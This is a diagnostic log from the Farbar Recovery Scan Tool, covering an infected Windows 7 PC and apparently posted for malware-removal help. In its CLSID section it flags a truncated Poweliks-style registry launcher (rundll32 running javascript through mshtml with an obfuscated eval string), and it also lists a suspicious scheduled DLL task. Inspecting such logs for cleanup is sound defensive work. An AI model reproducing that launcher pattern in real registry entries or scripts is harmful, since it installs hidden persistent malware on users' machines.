FF Plugin ProgramFiles/Appdata: C:\Program Files\mozilla firefox\plugins\RLMusicPacker.dll ()
FF Plugin ProgramFiles/Appdata: C:\Program Files\mozilla firefox\plugins\RLMusicUnpacker.dll ()
FF Plugin ProgramFiles/Appdata: C:\Program Files\mozilla firefox\plugins\RLVoicePacker.dll ()
FF Plugin ProgramFiles/Appdata: C:\Program Files\mozilla firefox\plugins\RLVoiceUnpacker.dll ()

========================== Services (Whitelisted) =================

(If an entry is included in the fixlist, the service will be removed from the registry. The file will not be moved unless listed separately.)

R2 AVGIDSAgent; C:\Program Files\AVG\AVG2015\avgidsagent.exe [3432976 2014-12-18] (AVG Technologies CZ, s.r.o.)
R2 avgwd; C:\Program Files\AVG\AVG2015\avgwdsvc.exe [298080 2014-12-18] (AVG Technologies CZ, s.r.o.)
R2 BcmBtRSupport; C:\Windows\system32\BtwRSupportService.exe [1678040 2013-10-02] (Broadcom Corporation.)
R2 SDScannerService; C:\Program Files\Spybot - Search & Destroy 2\SDFSSvc.exe [1738168 2014-06-24] (Safer-Networking Ltd.)
R2 SDUpdateService; C:\Program Files\Spybot - Search & Destroy 2\SDUpdSvc.exe [2088408 2014-06-27] (Safer-Networking Ltd.)
R2 SDWSCService; C:\Program Files\Spybot - Search & Destroy 2\SDWSCSvc.exe [171928 2014-04-25] (Safer-Networking Ltd.)
S3 WinDefend; C:\Program Files\Windows Defender\mpsvc.dll [680960 2013-05-26] (Microsoft Corporation)
S3 CaCCProvSP; "C:\Program Files\Total Defense\Internet Security Suite\ccprovsp.exe" [X]
S2 ccSchedulerSVC; C:\Program Files\Total Defense\Internet Security Suite\ccschedulersvc.exe [X]

==================== Drivers (Whitelisted) ====================

(If an entry is included in the fixlist, the service will be removed from the registry. The file will not be moved unless listed separately.)

R3 Acceler; C:\Windows\System32\DRIVERS\accelern.sys [44144 2011-10-03] (ST Microelectronics)
R1 Avgdiskx; C:\Windows\System32\DRIVERS\avgdiskx.sys [121624 2014-06-18] (AVG Technologies CZ, s.r.o.)
R1 AVGIDSDriver; C:\Windows\System32\DRIVERS\avgidsdriverx.sys [208152 2014-12-08] (AVG Technologies CZ, s.r.o.)
R0 AVGIDSHX; C:\Windows\System32\DRIVERS\avgidshx.sys [154904 2014-11-18] (AVG Technologies CZ, s.r.o.)
R1 AVGIDSShim; C:\Windows\System32\DRIVERS\avgidsshimx.sys [21272 2014-06-18] (AVG Technologies CZ, s.r.o.)
R1 Avgldx86; C:\Windows\System32\DRIVERS\avgldx86.sys [192792 2014-08-28] (AVG Technologies CZ, s.r.o.)
R0 Avglogx; C:\Windows\System32\DRIVERS\avglogx.sys [230680 2014-07-18] (AVG Technologies CZ, s.r.o.)
R0 Avgmfx86; C:\Windows\System32\DRIVERS\avgmfx86.sys [98584 2014-10-05] (AVG Technologies CZ, s.r.o.)
R0 Avgrkx86; C:\Windows\System32\DRIVERS\avgrkx86.sys [27416 2014-06-18] (AVG Technologies CZ, s.r.o.)
R1 Avgtdix; C:\Windows\System32\DRIVERS\avgtdix.sys [200984 2014-10-10] (AVG Technologies CZ, s.r.o.)
R3 bcbtums; C:\Windows\System32\drivers\bcbtums.sys [174936 2013-10-02] (Broadcom Corporation.)
S3 btwampfl; C:\Windows\System32\DRIVERS\btwampfl.sys [144600 2013-10-02] (Broadcom Corporation.)
R3 cvusbdrv; C:\Windows\System32\Drivers\cvusbdrv.sys [32808 2008-07-23] (Broadcom Corporation)
R3 NETwNs32; C:\Windows\System32\DRIVERS\Netwsn00.sys [10364416 2012-06-03] (Intel Corporation)
S2 risdpcie; C:\Windows\System32\DRIVERS\RISDPE64.SYS [79360 2009-10-28] (REDC) [File not signed]
R0 stdcfltn; C:\Windows\System32\DRIVERS\stdcfltn.sys [17904 2011-07-15] (ST Microelectronics)
S3 USB28xxBGA; C:\Windows\System32\DRIVERS\emBDAA.sys [660120 2012-05-04] (eMPIA Technology, Inc.)
S3 USB28xxOEM; C:\Windows\System32\DRIVERS\emOEMA.sys [1085592 2012-05-04] (eMPIA Technology, Inc.)
S3 catchme; \??\C:\Users\User\AppData\Local\Temp\catchme.sys [X]

==================== NetSvcs (Whitelisted) ===================

(If an item is included in the fixlist, it will be removed from the registry. Any associated file could be listed separately to be moved.)

==================== One Month Created Files and Folders ========

(If an entry is included in the fixlist, the file\folder will be moved.)

2015-01-24 16:11 - 2015-01-24 16:11 - 00050201 _____ () C:\ComboFix.txt
2015-01-24 13:30 - 2011-06-26 00:45 - 00256000 _____ () C:\Windows\PEV.exe
2015-01-24 13:30 - 2010-11-07 11:20 - 00208896 _____ () C:\Windows\MBR.exe
2015-01-24 13:30 - 2009-04-19 22:56 - 00060416 _____ (NirSoft) C:\Windows\NIRCMD.exe
2015-01-24 13:30 - 2000-08-30 18:00 - 00518144 _____ (SteelWerX) C:\Windows\SWREG.exe
2015-01-24 13:30 - 2000-08-30 18:00 - 00406528 _____ (SteelWerX) C:\Windows\SWSC.exe
2015-01-24 13:30 - 2000-08-30 18:00 - 00098816 _____ () C:\Windows\sed.exe
2015-01-24 13:30 - 2000-08-30 18:00 - 00080412 _____ () C:\Windows\grep.exe
2015-01-24 13:30 - 2000-08-30 18:00 - 00068096 _____ () C:\Windows\zip.exe
2015-01-24 13:28 - 2015-01-24 16:11 - 00000000 ____D () C:\Qoobox
2015-01-24 13:23 - 2015-01-24 16:08 - 00000000 ____D () C:\Windows\erdnt
2015-01-14 22:04 - 2015-01-24 17:32 - 00000000 ____D () C:\Users\User\Desktop\Malware stuff
2015-01-14 21:04 - 2015-01-24 17:32 - 00000000 ____D () C:\FRST
2015-01-14 19:59 - 2015-01-24 13:35 - 00000000 ___HD () C:\ProgramData\{D9E629DC-CB1C-4A97-9900-81922B4EFFD4}
2015-01-13 22:17 - 2014-12-11 23:11 - 03971512 _____ (Microsoft Corporation) C:\Windows\system32\ntkrnlpa.exe
2015-01-13 22:17 - 2014-12-11 23:11 - 03916728 _____ (Microsoft Corporation) C:\Windows\system32\ntoskrnl.exe
2015-01-13 21:13 - 2014-12-18 19:34 - 00116224 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\mrxdav.sys
2015-01-13 21:07 - 2014-12-18 20:43 - 00164864 _____ (Microsoft Corporation) C:\Windows\system32\profsvc.dll
2015-01-13 21:07 - 2014-12-11 11:47 - 00056320 _____ (Microsoft Corporation) C:\Windows\system32\TSWbPrxy.exe
2015-01-13 21:07 - 2014-12-05 21:50 - 00242688 _____ (Microsoft Corporation) C:\Windows\system32\nlasvc.dll
2015-01-12 09:58 - 2015-01-12 09:58 - 00000000 ____D () C:\Users\Default\AppData\Roaming\TuneUp Software
2015-01-12 09:58 - 2015-01-12 09:58 - 00000000 ____D () C:\Users\Default User\AppData\Roaming\TuneUp Software
2015-01-05 17:30 - 2015-01-07 17:21 - 00000000 ____D () C:\Users\User\Downloads\avast free
2015-01-02 13:33 - 2015-01-21 15:41 - 00034171 _____ () C:\Users\Public\Documents\Master Volunteer List thru Dec 2014.xlsx
2015-01-02 12:42 - 2015-01-02 12:42 - 00000165 ____H () C:\Users\Public\Documents\~$Master Volunteer List thru Nov 2014.xlsx

==================== One Month Modified Files and Folders =======

(If an entry is included in the fixlist, the file\folder will be moved.)

2015-01-24 17:28 - 2014-06-15 13:21 - 00000000 ____D () C:\Users\User\AppData\Roaming\Battle.net
2015-01-24 17:28 - 2014-06-15 13:21 - 00000000 ____D () C:\Users\User\AppData\Local\Battle.net
2015-01-24 17:28 - 2014-06-15 13:19 - 00000000 ____D () C:\ProgramData\Battle.net
2015-01-24 17:20 - 2013-10-16 13:14 - 00000000 ___HD () C:\Program Files\InstallShield Installation Information
2015-01-24 17:19 - 2014-01-29 03:10 - 00000000 ____D () C:\Users\User\AppData\Local\Cyberlink
2015-01-24 17:19 - 2013-10-16 13:12 - 00000000 ____D () C:\Program Files\CyberLink
2015-01-24 17:05 - 2013-02-11 12:09 - 00000830 _____ () C:\Windows\Tasks\Adobe Flash Player Updater.job
2015-01-24 16:59 - 2009-07-13 22:34 - 00024832 ____H () C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0
2015-01-24 16:59 - 2009-07-13 22:34 - 00024832 ____H () C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0
2015-01-24 16:57 - 2013-10-02 18:48 - 01923169 _____ () C:\Windows\WindowsUpdate.log
2015-01-24 16:52 - 2013-02-09 05:35 - 01161134 _____ () C:\Windows\PFRO.log
2015-01-24 16:52 - 2009-07-13 22:53 - 00000006 ____H () C:\Windows\Tasks\SA.DAT
2015-01-24 16:52 - 2009-07-13 22:39 - 00049504 _____ () C:\Windows\setupact.log
2015-01-24 16:26 - 2014-08-13 20:31 - 00114904 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\MBAMSwissArmy.sys
2015-01-24 16:22 - 2014-11-23 10:27 - 00000000 ____D () C:\ProgramData\MFAData
2015-01-24 16:11 - 2009-07-13 20:37 - 00000000 ___RD () C:\Users\Public
2015-01-24 16:04 - 2009-07-13 20:04 - 00000215 _____ () C:\Windows\system.ini
2015-01-22 13:07 - 2013-02-11 12:09 - 00701616 _____ (Adobe Systems Incorporated) C:\Windows\system32\FlashPlayerApp.exe
2015-01-22 13:07 - 2013-02-11 12:09 - 00071344 _____ (Adobe Systems Incorporated) C:\Windows\system32\FlashPlayerCPLApp.cpl
2015-01-14 21:01 - 2013-02-08 18:15 - 00781298 _____ () C:\Windows\system32\PerfStringBackup.INI
2015-01-14 20:00 - 2014-11-10 08:03 - 00000000 ____D () C:\ProgramData\Windows Genuine Advantage
2015-01-13 23:28 - 2013-10-16 12:33 - 00000000 ____D () C:\Windows\system32\MRT
2015-01-13 23:24 - 2013-02-08 18:33 - 110348472 _____ (Microsoft Corporation) C:\Windows\system32\MRT.exe
2015-01-12 09:58 - 2014-11-23 11:33 - 00000935 _____ () C:\Users\Public\Desktop\AVG 2015.lnk
2015-01-12 09:58 - 2014-11-23 11:33 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AVG
2015-01-08 21:16 - 2014-05-14 17:47 - 00000000 ____D () C:\Users\Public\Documents\Kayla
2015-01-05 17:22 - 2014-08-13 20:31 - 00001060 _____ () C:\Users\Public\Desktop\Malwarebytes Anti-Malware.lnk
2015-01-05 17:22 - 2014-08-13 20:31 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes Anti-Malware
2015-01-05 17:22 - 2014-08-13 20:31 - 00000000 ____D () C:\Program Files\Malwarebytes Anti-Malware
2015-01-02 13:30 - 2014-12-04 10:50 - 00032082 _____ () C:\Users\Public\Documents\Master Volunteer List thru Nov 2014.xlsx

==================== Files in the root of some directories =======

2014-11-04 21:33 - 2014-11-04 21:33 - 0000000 _____ () C:\Users\User\AppData\Roaming\qkmrs.dll
2013-12-25 09:47 - 2014-01-25 12:43 - 0005632 _____ () C:\Users\User\AppData\Local\DCBC2A71-70D8-4DAN-EHR8-E0D61DEA3FDF.ini
2013-10-21 22:14 - 2013-10-21 22:14 - 0007602 _____ () C:\Users\User\AppData\Local\Resmon.ResmonCfg

==================== Bamital & volsnap Check =================

(There is no automatic fix for files that do not pass verification.)

C:\Windows\explorer.exe => File is digitally signed
C:\Windows\system32\winlogon.exe => File is digitally signed
C:\Windows\system32\wininit.exe => File is digitally signed
C:\Windows\system32\svchost.exe => File is digitally signed
C:\Windows\system32\services.exe => File is digitally signed
C:\Windows\system32\User32.dll => File is digitally signed
C:\Windows\system32\userinit.exe => File is digitally signed
C:\Windows\system32\rpcss.dll => File is digitally signed
C:\Windows\system32\Drivers\volsnap.sys => File is digitally signed

LastRegBack: 2015-01-14 17:23

==================== End Of Log ============================

 

 

Here is the Additional file:

Additional scan result of Farbar Recovery Scan Tool (x86) Version: 24-01-2015 01
Ran by User at 2015-01-24 17:32:50
Running from C:\Users\User\Desktop\Malware stuff
Boot Mode: Normal
==========================================================

==================== Security Center ========================

(If an entry is included in the fixlist, it will be removed.)

AV: AVG AntiVirus Free Edition 2015 (Enabled - Up to date) {0E9420C4-06B3-7FA0-3AB1-6E49CB52ECD9}
AS: Windows Defender (Disabled - Out of date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AS: Spybot - Search and Destroy (Enabled - Up to date) {9BC38DF1-3CCA-732D-A930-C1CA5F20A4B0}
AS: AVG AntiVirus Free Edition 2015 (Enabled - Up to date) {B5F5C120-2089-702E-0001-553BB0D5A664}

==================== Installed Programs ======================

(Only the adware programs with "hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)

Adobe Flash Player 16 ActiveX (HKLM\...\Adobe Flash Player ActiveX) (Version: 16.0.0.287 - Adobe Systems Incorporated)
Adobe Reader XI (11.0.10) (HKLM\...\{AC76BA86-7AD7-1033-7B44-AB0000000001}) (Version: 11.0.10 - Adobe Systems Incorporated)
Advanced Audio FX Engine (HKLM\...\Advanced Audio FX Engine) (Version: 1.12.05 - Creative Technology Ltd)
AVG 2015 (HKLM\...\AVG) (Version: 2015.0.5645 - AVG Technologies)
AVG 2015 (Version: 15.0.4273 - AVG Technologies) Hidden
AVG 2015 (Version: 15.0.5645 - AVG Technologies) Hidden
CorelVHS3X86 (HKLM\...\{CB91D8EE-AAC8-4921-AFCB-DB700EEF9D9B}) (Version: 1.05.0000 - Corel)
D3DX10 (Version: 15.4.2368.0902 - Microsoft) Hidden
Dell System Detect (HKU\S-1-5-21-3179565126-1180787063-359821708-1000\...\73f463568823ebbe) (Version: 5.12.0.3 - Dell)
Dell Touchpad (HKLM\...\{9F72EF8B-AEC9-4CA5-B483-143980AFD6FD}) (Version: 7.1007.101.210 - ALPS ELECTRIC CO., LTD.)
Dell Webcam Central (HKLM\...\Dell Webcam Central) (Version: 1.40.05 - Creative Technology Ltd)
Intel® Network Connections Drivers (HKLM\...\PROSet) (Version: 14.8 - Intel)
Java 7 Update 71 (HKLM\...\{26A24AE4-039D-4CA4-87B4-2F03217071FF}) (Version: 7.0.710 - Oracle)
Junk Mail filter update (Version: 16.4.3505.0912 - Microsoft Corporation) Hidden
Live! Cam Avatar Creator (HKLM\...\{65D0C510-D7B6-4438-9FC8-E6B91115AB0D}) (Version: 4.6.3009.1 - Creative Technology Ltd)
Malwarebytes Anti-Malware version 2.0.4.1028 (HKLM\...\Malwarebytes Anti-Malware_is1) (Version: 2.0.4.1028 - Malwarebytes Corporation)
Microsoft .NET Framework 4.5.1 (HKLM\...\{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1033) (Version: 4.5.50938 - Microsoft Corporation)
Microsoft Office 2007 Service Pack 3 (SP3) (HKLM\...\{91120000-002F-0000-0000-0000000FF1CE}_HOMESTUDENTR_{6E107EB7-8B55-48BF-ACCB-199F86A2CD93}) (Version:  - Microsoft)
Microsoft Office File Validation Add-In (HKLM\...\{90140000-2005-0000-0000-0000000FF1CE}) (Version: 14.0.5130.5003 - Microsoft Corporation)
Microsoft Office Home and Student 2007 (HKLM\...\HOMESTUDENTR) (Version: 12.0.6612.1000 - Microsoft Corporation)
Microsoft SkyDrive (HKU\S-1-5-21-3179565126-1180787063-359821708-1000\...\SkyDriveSetup.exe) (Version: 16.4.6013.0910 - Microsoft Corporation)
Microsoft SQL Server 2005 Compact Edition [ENU] (HKLM\...\{F0B430D1-B6AA-473D-9B06-AA3DD01FD0B8}) (Version: 3.1.0000 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM\...\{7299052b-02a4-4627-81f2-1818da5d550d}) (Version: 8.0.56336 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2010  x86 Redistributable - 10.0.40219 (HKLM\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
Movie Maker (Version: 16.4.3505.0912 - Microsoft Corporation) Hidden
MSXML 4.0 SP2 (KB954430) (HKLM\...\{86493ADD-824D-4B8E-BD72-8C5DCDC52A71}) (Version: 4.20.9870.0 - Microsoft Corporation)
MSXML 4.0 SP2 (KB973688) (HKLM\...\{F662A8E6-F4DC-41A2-901E-8C11F044BDEC}) (Version: 4.20.9876.0 - Microsoft Corporation)
My Dell (HKLM\...\PC-Doctor for Windows) (Version: 3.5.6426.22 - PC-Doctor, Inc.)
OpenOffice 4.0.1 (HKLM\...\{47F460DA-D1BE-4D85-8DF2-AA1F31D3445F}) (Version: 4.01.9714 - Apache Software Foundation)
Revo Uninstaller 1.95 (HKLM\...\Revo Uninstaller) (Version: 1.95 - VS Revo Group)
Spybot - Search & Destroy (HKLM\...\{B4092C6D-E886-4CB2-BA68-FE5A99D31DE7}_is1) (Version: 2.4.40 - Safer-Networking Ltd.)
Update for 2007 Microsoft Office System (KB967642) (HKLM\...\{91120000-002F-0000-0000-0000000FF1CE}_HOMESTUDENTR_{C444285D-5E4F-48A4-91DD-47AAAA68E92D}) (Version:  - Microsoft)
Visual Studio 2012 x86 Redistributables (HKLM\...\{98EFF19A-30AB-4E4B-B943-F06B1C63EBF8}) (Version: 14.0.0.1 - AVG Technologies CZ, s.r.o.)
Windows Live Essentials (HKLM\...\WinLiveSuite) (Version: 16.4.3505.0912 - Microsoft Corporation)

==================== Custom CLSID (selected items): ==========================

(If an entry is included in the fixlist, it will be removed from registry. Any eventual file will not be moved.)

CustomCLSID: HKU\S-1-5-21-3179565126-1180787063-359821708-1000_Classes\CLSID\{1c492e6a-2803-5ed7-83e1-1b1d4d41eb39}\InprocServer32 -> C:\Program Files\Ubisoft\Ubisoft Game Launcher\npuplaypc.dll No File
CustomCLSID: HKU\S-1-5-21-3179565126-1180787063-359821708-1000_Classes\CLSID\{7B37E4E2-C62F-4914-9620-8FB5062718CC}\localserver32 -> C:\Users\User\AppData\Local\Microsoft\SkyDrive\SkyDrive.exe (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-3179565126-1180787063-359821708-1000_Classes\CLSID\{A0396A93-DC06-4AEF-BEE9-95FFCCAEF20E}\InprocServer32 -> C:\Users\User\AppData\Local\Microsoft\SkyDrive\16.4.6013.0910\SkyDriveShell.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-3179565126-1180787063-359821708-1000_Classes\CLSID\{AB807329-7324-431B-8B36-DBD581F56E0B}\localserver32 -> C:\Users\User\AppData\Local\Microsoft\SkyDrive\SkyDrive.exe (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-3179565126-1180787063-359821708-1000_Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}\localserver32 -> rundll32.exe javascript:"\..\mshtml.dll,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf> (the data entry has 251 more characters). <==== Poweliks?
CustomCLSID: HKU\S-1-5-21-3179565126-1180787063-359821708-1000_Classes\CLSID\{BBACC218-34EA-4666-9D7A-C78F2274A524}\InprocServer32 -> C:\Users\User\AppData\Local\Microsoft\SkyDrive\16.4.6013.0910\SkyDriveShell.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-3179565126-1180787063-359821708-1000_Classes\CLSID\{F241C880-6982-4CE5-8CF7-7085BA96DA5A}\InprocServer32 -> C:\Users\User\AppData\Local\Microsoft\SkyDrive\16.4.6013.0910\SkyDriveShell.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-3179565126-1180787063-359821708-1000_Classes\CLSID\{F8071786-1FD0-4A66-81A1-3CBE29274458}\InprocServer32 -> C:\Users\User\AppData\Local\Microsoft\SkyDrive\16.4.6013.0910\FileSyncApi.dll (Microsoft Corporation)

==================== Restore Points  =========================

24-01-2015 13:30:52 ComboFix created restore point
24-01-2015 17:17:02 Configured PowerDVD
24-01-2015 17:21:57 Revo Uninstaller's restore point - Battle.net

==================== Hosts content: ==========================

(If needed Hosts: directive could be included in the fixlist to reset Hosts.)

2009-07-13 20:04 - 2015-01-24 16:03 - 00000027 ____A C:\Windows\system32\Drivers\etc\hosts
127.0.0.1       localhost

==================== Scheduled Tasks (whitelisted) =============

(If an entry is included in the fixlist, it will be removed from registry. Any associated file could be listed separately to be moved.)

Task: {24101962-EFCD-48A3-9588-FE6571943DD3} - System32\Tasks\Adobe Acrobat Update Task => C:\Program Files\Common Files\Adobe\ARM\1.0\AdobeARM.exe [2014-12-19] (Adobe Systems Incorporated)
Task: {2E82AEF7-774A-4868-BDA0-4176292D000C} - System32\Tasks\{EBC0B43D-34B9-407B-966A-63943AD95EE7} => C:\Program Files\Freemake\Freemake Video Converter\FreemakeVideoConverter.exe
Task: {4480FA26-0DE2-4425-8D00-BFBA97D00B67} - System32\Tasks\Safer-Networking\Spybot - Search and Destroy\Refresh immunization => C:\Program Files\Spybot - Search & Destroy 2\SDImmunize.exe
Task: {534DD19A-C485-4F2C-8C31-A3D51C2B3CFD} - System32\Tasks\Safer-Networking\Spybot - Search and Destroy\Scan the system => C:\Program Files\Spybot - Search & Destroy 2\SDScan.exe
Task: {5A6E07FB-BBC2-486C-8AF9-3ECD66601DA8} - \BrowserSafeguard Update Task No Task File <==== ATTENTION
Task: {71519836-8433-4BC1-A669-7BFFA4D8575A} - System32\Tasks\PCDEventLauncherTask => C:\Program Files\My Dell\sessionchecker.exe [2014-01-10] (PC-Doctor, Inc.)
Task: {A27C9E40-6522-4874-B404-6587317BB031} - System32\Tasks\Safer-Networking\Spybot - Search and Destroy\Check for updates => C:\Program Files\Spybot - Search & Destroy 2\SDUpdate.exe
Task: {B0AD704E-4AD4-4673-AFD9-33AED5FFFD0D} - \Optimizer Pro Schedule No Task File <==== ATTENTION
Task: {BE538E25-6810-47D7-9746-96E8507E6CDE} - \BrowserSafeguard No Task File <==== ATTENTION
Task: {E919B31C-4400-4B2E-8926-FAA405BBA3E3} - System32\Tasks\{9BEDCEF3-9189-5EED-E739-0431EB9E4EBE} => C:\Users\User\AppData\Roaming\dkpxfv.dll/s "C:\Users\User\AppData\Roaming\dkpxfv.dll" <==== ATTENTION
Task: {FE1E3EA7-3A55-42D9-B9F4-A40D5FDEA276} - System32\Tasks\Adobe Flash Player Updater => C:\Windows\system32\Macromed\Flash\FlashPlayerUpdateService.exe [2015-01-22] (Adobe Systems Incorporated)

(If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.)

Task: C:\Windows\Tasks\Adobe Flash Player Updater.job => C:\Windows\system32\Macromed\Flash\FlashPlayerUpdateService.exe

==================== Loaded Modules (whitelisted) =============

2014-11-23 21:08 - 2014-05-13 12:04 - 00109400 _____ () C:\Program Files\Spybot - Search & Destroy 2\snlThirdParty150.bpl
2014-11-23 21:08 - 2014-05-13 12:04 - 00416600 _____ () C:\Program Files\Spybot - Search & Destroy 2\DEC150.bpl
2014-11-23 21:08 - 2014-05-13 12:04 - 00167768 _____ () C:\Program Files\Spybot - Search & Destroy 2\snlFileFormats150.bpl
2014-11-23 21:08 - 2012-08-23 10:38 - 00574840 _____ () C:\Program Files\Spybot - Search & Destroy 2\sqlite3.dll
2014-11-23 21:08 - 2012-04-03 17:06 - 00565640 _____ () C:\Program Files\Spybot - Search & Destroy 2\av\BDSmartDB.dll
2012-01-10 22:12 - 2012-01-10 22:12 - 00094208 _____ () C:\Windows\System32\IccLibDll.dll

==================== Alternate Data Streams (whitelisted) =========

(If an entry is included in the fixlist, only the Alternate Data Streams will be removed.)

AlternateDataStreams: C:\ProgramData\TEMP:373E1720

==================== Safe Mode (whitelisted) ===================

(If an item is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.)

HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\Wdf01000.sys => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\Wdf01000.sys => ""="Driver"

==================== EXE Association (whitelisted) =============

(If an entry is included in the fixlist, the default will be restored. None default entries will be removed.)

==================== MSCONFIG/TASK MANAGER disabled items =========

(Currently there is no automatic fix for this section.)

========================= Accounts: ==========================

Administrator (S-1-5-21-3179565126-1180787063-359821708-500 - Administrator - Disabled)
Guest (S-1-5-21-3179565126-1180787063-359821708-501 - Limited - Disabled)
HomeGroupUser$ (S-1-5-21-3179565126-1180787063-359821708-1002 - Limited - Enabled)
User (S-1-5-21-3179565126-1180787063-359821708-1000 - Administrator - Enabled) => C:\Users\User

==================== Faulty Device Manager Devices =============

==================== Event log errors: =========================

Application errors:
==================
Error: (01/24/2015 05:17:00 PM) (Source: VSS) (EventID: 8194) (User: )
Description: Volume Shadow Copy Service error: Unexpected error querying for the IVssWriterCallback interface.  hr = 0x80070005, Access is denied.
.
This is often caused by incorrect security settings in either the writer or requestor process.

Operation:
   Gathering Writer Data

Context:
   Writer Class Id: {e8132975-6f93-4464-a53e-1050253ae220}
   Writer Name: System Writer
   Writer Instance ID: {989c0791-8944-4af3-9e28-21583bc66cc7}

Error: (01/23/2015 00:59:11 PM) (Source: Application Hang) (EventID: 1002) (User: )
Description: The program iexplore.exe version 11.0.9600.17496 stopped interacting with Windows and was closed. To see if more information about the problem is available, check the problem history in the Action Center control panel.

Process ID: 2328

Start Time: 01d0365772617e5f

Termination Time: 1607

Application Path: C:\Program Files\Internet Explorer\iexplore.exe

Report Id:

Error: (01/22/2015 02:30:08 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: iexplore.exe, version: 11.0.9600.17496, time stamp: 0x4a5bc292
Faulting module name: MSHTML.dll, version: 11.0.9600.17496, time stamp: 0x546ff2f9
Exception code: 0xc00000fd
Fault offset: 0x00120dbf
Faulting process id: 0x119a4
Faulting application start time: 0xiexplore.exe0
Faulting application path: iexplore.exe1
Faulting module path: iexplore.exe2
Report Id: iexplore.exe3

Error: (01/22/2015 01:14:15 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: iexplore.exe, version: 11.0.9600.17496, time stamp: 0x525b84d1
Faulting module name: MSHTML.dll, version: 11.0.9600.17496, time stamp: 0x546ff2f9
Exception code: 0xc00000fd
Fault offset: 0x00120dbf
Faulting process id: 0xcc44
Faulting application start time: 0xiexplore.exe0
Faulting application path: iexplore.exe1
Faulting module path: iexplore.exe2
Report Id: iexplore.exe3

Error: (01/22/2015 10:01:04 AM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: iexplore.exe, version: 11.0.9600.17496, time stamp: 0x4a5bc959
Faulting module name: MSHTML.dll, version: 11.0.9600.17496, time stamp: 0x546ff2f9
Exception code: 0xc00000fd
Fault offset: 0x00120dbf
Faulting process id: 0x3a14
Faulting application start time: 0xiexplore.exe0
Faulting application path: iexplore.exe1
Faulting module path: iexplore.exe2
Report Id: iexplore.exe3

Error: (01/22/2015 09:04:39 AM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: iexplore.exe, version: 11.0.9600.17496, time stamp: 0x4a5bc6b8
Faulting module name: MSHTML.dll, version: 11.0.9600.17496, time stamp: 0x546ff2f9
Exception code: 0xc00000fd
Fault offset: 0x001202bc
Faulting process id: 0x17a0
Faulting application start time: 0xiexplore.exe0
Faulting application path: iexplore.exe1
Faulting module path: iexplore.exe2
Report Id: iexplore.exe3

Error: (01/22/2015 08:10:52 AM) (Source: Application Hang) (EventID: 1002) (User: )
Description: The program iexplore.exe version 11.0.9600.17496 stopped interacting with Windows and was closed. To see if more information about the problem is available, check the problem history in the Action Center control panel.

Process ID: 3880

Start Time: 01d035c7218aa0dd

Termination Time: 919

Application Path: C:\Program Files\Internet Explorer\iexplore.exe

Report Id:

Error: (01/22/2015 07:29:55 AM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: iexplore.exe, version: 11.0.9600.17496, time stamp: 0x4a5bcbb9
Faulting module name: Flash32_16_0_0_257.ocx, version: 16.0.0.257, time stamp: 0x549259f5
Exception code: 0xc0000005
Fault offset: 0x006a6dfa
Faulting process id: 0x292c
Faulting application start time: 0xiexplore.exe0
Faulting application path: iexplore.exe1
Faulting module path: iexplore.exe2
Report Id: iexplore.exe3

Error: (01/22/2015 07:25:15 AM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: iexplore.exe, version: 11.0.9600.17496, time stamp: 0x4a5bc100
Faulting module name: Flash32_16_0_0_257.ocx, version: 16.0.0.257, time stamp: 0x549259f5
Exception code: 0xc0000005
Fault offset: 0x006a6dfa
Faulting process id: 0x29bc
Faulting application start time: 0xiexplore.exe0
Faulting application path: iexplore.exe1
Faulting module path: iexplore.exe2
Report Id: iexplore.exe3

Error: (01/21/2015 09:10:40 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: iexplore.exe, version: 11.0.9600.17496, time stamp: 0x4a5bcb52
Faulting module name: MSHTML.dll, version: 11.0.9600.17496, time stamp: 0x546ff2f9
Exception code: 0xc00000fd
Fault offset: 0x001202bc
Faulting process id: 0x3a2c
Faulting application start time: 0xiexplore.exe0
Faulting application path: iexplore.exe1
Faulting module path: iexplore.exe2
Report Id: iexplore.exe3

System errors:
=============
Error: (01/24/2015 05:16:38 PM) (Source: Schannel) (EventID: 4120) (User: NT AUTHORITY)
Description: The following fatal alert was generated: 40. The internal error state is 252.

